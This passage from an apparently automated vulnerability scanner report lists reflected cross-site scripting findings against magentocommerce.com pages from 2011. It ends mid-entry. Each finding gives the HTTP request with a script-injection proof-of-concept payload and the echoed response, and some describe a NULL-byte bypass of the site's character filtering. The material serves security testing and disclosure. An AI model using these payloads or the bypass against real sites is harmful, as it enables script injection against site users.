<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/upsellsfea2e"><script>alert(1)</script>1e31a06b711/view">
...[SNIP]...

1.42. http://www.magentocommerce.com/media/screencasts/upsells/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0073488"><script>alert(1)</script>a85e9f53621 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73488"><script>alert(1)</script>a85e9f53621 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/upsells/view?%0073488"><script>alert(1)</script>a85e9f53621=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176275; expires=Sat, 11-Aug-2012 15:11:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Fscreencasts%2Fupsells%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:15 GMT
Content-Length: 33220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/upsells/view?%0073488"><script>alert(1)</script>a85e9f53621=1">
...[SNIP]...

1.43. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2691"><script>alert(1)</script>76ef6f1716c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/working-with-paypala2691"><script>alert(1)</script>76ef6f1716c/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176250; expires=Sat, 11-Aug-2012 15:10:50 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:50 GMT
Content-Length: 33502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/working-with-paypala2691"><script>alert(1)</script>76ef6f1716c/view">
...[SNIP]...

1.44. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0074a5c"><script>alert(1)</script>763ed951bbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74a5c"><script>alert(1)</script>763ed951bbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/working-with-paypal/view?%0074a5c"><script>alert(1)</script>763ed951bbf=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176176; expires=Sat, 11-Aug-2012 15:09:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:36 GMT
Content-Length: 40888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/working-with-paypal/view?%0074a5c"><script>alert(1)</script>763ed951bbf=1">
...[SNIP]...

1.45. http://www.magentocommerce.com/products/checkout/cart/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43075"><script>alert(1)</script>5dc7f68ca25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/checkout43075"><script>alert(1)</script>5dc7f68ca25/cart/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:55 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:54 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/checkout43075"><script>alert(1)</script>5dc7f68ca25/cart/" />
...[SNIP]...

1.46. http://www.magentocommerce.com/products/checkout/cart/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a1db"><script>alert(1)</script>dbe4e525590 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/checkout/cart7a1db"><script>alert(1)</script>dbe4e525590/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:56 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:55 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/checkout/cart7a1db"><script>alert(1)</script>dbe4e525590/" />
...[SNIP]...

1.47. http://www.magentocommerce.com/products/checkout/cart/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b941"><script>alert(1)</script>9ebe58ff066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/checkout/cart/?1b941"><script>alert(1)</script>9ebe58ff066=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:01 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:00 GMT; path=/; domain=magentocommerce.com
Content-Length: 23073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Shopping
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/checkout/cart/?1b941"><script>alert(1)</script>9ebe58ff066=1" />
...[SNIP]...

1.48. http://www.magentocommerce.com/products/customer/account/create/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/customer/account/create/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74218"><script>alert(1)</script>f69b9c107fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/customer74218"><script>alert(1)</script>f69b9c107fe/account/create/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:04:38 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:37 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/customer74218"><script>alert(1)</script>f69b9c107fe/account/create/" />
...[SNIP]...

1.49. http://www.magentocommerce.com/products/customer/account/forgotpassword/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/customer/account/forgotpassword/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75651"><script>alert(1)</script>5f880c0eeda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/customer75651"><script>alert(1)</script>5f880c0eeda/account/forgotpassword/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:34 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:33 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/customer75651"><script>alert(1)</script>5f880c0eeda/account/forgotpassword/" />
...[SNIP]...

1.50. http://www.magentocommerce.com/products/customer/account/loginPost/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/customer/account/loginPost/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c50"><script>alert(1)</script>6a963e07cd1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/customer57c50"><script>alert(1)</script>6a963e07cd1/account/loginPost/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:45 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:44 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/customer57c50"><script>alert(1)</script>6a963e07cd1/account/loginPost/" />
...[SNIP]...

1.51. http://www.magentocommerce.com/products/ee/sso/logout [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/ee/sso/logout

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4277a"><script>alert(1)</script>af34fe383a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/4277a"><script>alert(1)</script>af34fe383a9/sso/logout HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://go.magento.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: frontend=m5u80l3aj47i2qg51avp3sfjm5; expires=Sat, 13-Aug-2011 15:01:20 GMT; path=/products
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=m5u80l3aj47i2qg51avp3sfjm5; expires=Sat, 13-Aug-2011 15:01:20 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:01:19 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/4277a"><script>alert(1)</script>af34fe383a9/sso/logout" />
...[SNIP]...

1.52. http://www.magentocommerce.com/products/job-post.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/job-post.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f02fa"><script>alert(1)</script>f908b06c15f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/job-post.htmlf02fa"><script>alert(1)</script>f908b06c15f HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:04:04 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:04:03 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/job-post.htmlf02fa"><script>alert(1)</script>f908b06c15f" />
...[SNIP]...

1.53. http://www.magentocommerce.com/products/job-post.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/job-post.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18915"><script>alert(1)</script>8cadda0bb16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/job-post.html?18915"><script>alert(1)</script>8cadda0bb16=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:03:23 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:03:22 GMT; path=/; domain=magentocommerce.com
Content-Length: 31497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Job Post
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/job-post.html?18915"><script>alert(1)</script>8cadda0bb16=1" />
...[SNIP]...

1.54. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/skin/frontend/enterprise/mc/favicon.ico

Issue detail

